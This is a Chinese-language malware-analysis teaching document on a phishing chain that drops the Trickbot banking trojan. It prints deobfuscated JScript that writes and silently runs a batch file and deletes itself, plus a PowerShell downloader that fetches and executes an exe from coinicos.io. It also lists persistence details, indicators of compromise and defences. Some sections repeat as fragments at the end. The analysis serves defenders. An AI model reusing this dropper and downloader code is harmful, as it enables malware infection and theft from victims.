钓鱼攻击样本分析与防御教学文档<\/h1>

一、钓鱼攻击概述<\/h2>
钓鱼攻击是一种通过伪装成可信来源（如电子邮件、网站或文件）来诱骗受害者泄露敏感信息或执行恶意代码的攻击方式。本案例展示了一个精心设计的钓鱼攻击链，结合了多种技术手段。<\/p>

二、攻击流程分析<\/h2>

1. 初始感染媒介<\/h3>

攻击载体<\/strong>：钓鱼邮件<\/li>
诱饵内容<\/strong>：伪装成PDF文件的链接<\/li>

社会工程技巧<\/strong>：邮件正文包含未使用的密码，增加可信度<\/li> <\/ul>
2. 恶意网站交互<\/h3>

初始页面<\/strong>：模拟空白PDF文件<\/li>
触发机制<\/strong>：利用JavaScript监听滚动事件<\/li> <\/ul>
window.onscroll<\/span> =<\/span> function<\/span> (e<\/span>) { <\/span><\/span> \/\/ 触发恶意代码 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 恶意载荷投放<\/h3> 伪装<\/strong>：显示虚假的"Adobe PDF插件更新"提示<\/li> 文件名<\/strong>：Adobe-PDF-Install.js（实际是恶意JavaScript）<\/li> <\/ul> 三、恶意代码分析<\/h2> 1. 代码混淆技术<\/h3> 攻击者使用了多层混淆技术：<\/p> 字符串分割和重组<\/li> 数组索引引用<\/li> 动态函数构造<\/li> 随机字符插入<\/li> <\/ul> 2. 核心恶意功能<\/h3> 经过反混淆处理后，核心代码执行以下操作：<\/p> var<\/span> fso<\/span> =<\/span> new<\/span> ActiveXObject<\/span>("Scripting.FileSystemObject"<\/span>); <\/span><\/span>var<\/span> temp<\/span> =<\/span> fso<\/span>.GetSpecialFolder<\/span>(2<\/span>); \/\/ 获取临时文件夹 <\/span><\/span><\/span><\/span>var<\/span> script<\/span> =<\/span> "PowerShell \"function Ebfu8([String] $mcudvlsla) { (New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'"<\/span> +<\/span> temp<\/span> +<\/span> "\\noqnwutj.exe');Start-Process '"<\/span> +<\/span> temp<\/span> +<\/span> "\\noqnwutj.exe';} try{Ebfu8('http:\/\/coinicos.io\/images\/logo.bin')}catch{Ebfu8('http:\/\/coinicos.io\/images\/logo.bin')}\""<\/span>; <\/span><\/span>var<\/span> nameBat<\/span> =<\/span> "sdjkfh"<\/span>; <\/span><\/span>var<\/span> pathBat<\/span> =<\/span> temp<\/span> +<\/span> "\\"<\/span> +<\/span> nameBat<\/span> +<\/span> ".bat"<\/span>; <\/span><\/span>var<\/span> outFile<\/span> =<\/span> fso<\/span>.CreateTextFile<\/span>(pathBat<\/span>, true<\/span>); <\/span><\/span>outFile<\/span>.WriteLine<\/span>(script<\/span>); <\/span><\/span>outFile<\/span>.Close<\/span>(); <\/span><\/span>var<\/span> shell<\/span> =<\/span> new<\/span> ActiveXObject<\/span>("WScript.Shell"<\/span>); <\/span><\/span>shell<\/span>.run<\/span>(pathBat<\/span>, 0<\/span>); <\/span><\/span>fso<\/span>.DeleteFile<\/span>(WSH<\/span>.ScriptFullName<\/span>); \/\/ 删除自身 <\/span><\/span><\/span><\/code><\/pre>3. PowerShell载荷<\/h3> 生成的批处理文件包含以下PowerShell命令：<\/p> function<\/span> Ebfu8([String]<\/span> $mcudvlsla) { <\/span><\/span> (New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe'<\/span>); <\/span><\/span> Start-Process 'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe'<\/span>; <\/span><\/span>} <\/span><\/span>try<\/span> { <\/span><\/span> Ebfu8('http:\/\/coinicos.io\/images\/logo.bin'<\/span>) <\/span><\/span>} catch<\/span> { <\/span><\/span> Ebfu8('http:\/\/coinicos.io\/images\/logo.bin'<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、攻击链完整分析<\/h2> 电子邮件<\/strong> → 2. JavaScript<\/strong> → 3. PowerShell<\/strong> → 4. 批处理文件<\/strong> → 5. 计划任务持久化<\/strong><\/li> <\/ol> 持久化机制<\/h3> 将自身复制到：%APPDATA%\Roaming\wsxmail\lloydt.exe<\/code><\/li> 创建计划任务："MsTools"<\/li> <\/ul> 五、恶意软件分析<\/h2> 家族<\/strong>：Trickbot<\/li> VT评分<\/strong>：19\/66（检测率）<\/li> 主要功能<\/strong>：银行木马，具有窃取加密货币能力<\/li> <\/ul> 六、防御措施<\/h2> 1. 用户教育<\/h3> 警惕不明来源的邮件附件和链接<\/li> 验证所有软件更新的真实性<\/li> 不随意启用ActiveX或宏功能<\/li> <\/ul> 2. 技术防护<\/h3> -<\/span> 启用电子邮件过滤和沙箱检测 <\/span><\/span>-<\/span> 限制PowerShell执行策略 <\/span><\/span>-<\/span> 监控计划任务创建行为 <\/span><\/span>-<\/span> 实施应用程序白名单 <\/span><\/span>-<\/span> 禁用不必要的ActiveX控件 <\/span><\/span><\/code><\/pre>3. 检测指标<\/h3> 域名<\/strong>：coinicos.io<\/li> 文件路径<\/strong>： %TEMP%\noqnwutj.exe<\/code><\/li> %APPDATA%\Roaming\wsxmail\lloydt.exe<\/code><\/li> <\/ul> <\/li> 计划任务名<\/strong>：MsTools<\/li> <\/ul> 七、事件响应建议<\/h2> 隔离受感染主机<\/li> 检查计划任务列表<\/li> 审查临时文件夹和AppData目录<\/li> 收集并分析相关日志<\/li> 重置可能泄露的凭证<\/li> <\/ol> 八、参考资源<\/h2> VirusTotal分析<\/a><\/li> 计划任务持久化技术<\/a><\/li> Trickbot分析报告<\/a><\/li> <\/ol>

钓鱼攻击样本分析与防御教学文档<\/h1>

一、钓鱼攻击概述<\/h2> 钓鱼攻击是一种通过伪装成可信来源（如电子邮件、网站或文件）来诱骗受害者泄露敏感信息或执行恶意代码的攻击方式。本案例展示了一个精心设计的钓鱼攻击链，结合了多种技术手段。<\/p>

二、攻击流程分析<\/h2>

三、恶意代码分析<\/h2>

六、防御措施<\/h2>

八、参考资源<\/h2> VirusTotal分析<\/a><\/li> 计划任务持久化技术<\/a><\/li> Trickbot分析报告<\/a><\/li> <\/ol>

一、钓鱼攻击概述<\/h2>
钓鱼攻击是一种通过伪装成可信来源（如电子邮件、网站或文件）来诱骗受害者泄露敏感信息或执行恶意代码的攻击方式。本案例展示了一个精心设计的钓鱼攻击链，结合了多种技术手段。<\/p>

八、参考资源<\/h2>

VirusTotal分析<\/a><\/li>
计划任务持久化技术<\/a><\/li>
Trickbot分析报告<\/a><\/li> <\/ol>